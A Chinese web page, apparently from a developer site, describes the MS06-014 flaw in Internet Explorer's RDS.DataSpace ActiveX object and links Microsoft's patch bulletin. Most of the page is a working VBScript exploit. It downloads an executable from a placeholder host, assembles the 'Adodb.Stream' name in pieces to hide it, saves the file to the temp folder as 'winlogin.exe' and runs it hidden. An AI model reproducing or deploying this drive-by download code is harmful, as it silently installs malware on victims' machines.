【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件


请执行下面的代码测试您的机器是否存在漏洞:


[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
复制代码 代码如下:

on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0



相关阅读:
jQuery 1.3 和 Validation 验证插件1.5.1
Windows Themes外观视觉样式故障汇总
5个JAVASCRIPT框架详细的比较
了解Linux新一代安装包格式Autopackage
centos5 源码安装Nginx + mysql + apache + php的方法
Palm采用Linux内核 将推第二代操作系统
本地ISO或光盘作Fedora软件源进行软件管理
为什么我的 Mysql 不支持中文查询?
JAVA Servlets简介
正则表达式学习笔记
带你进入Windows7系统的安全模式
PHP模拟SQL Server的两个日期处理函数
JavaScript触发器详解
使用组件和对象
快速导航

Copyright © 2016 phpStudy |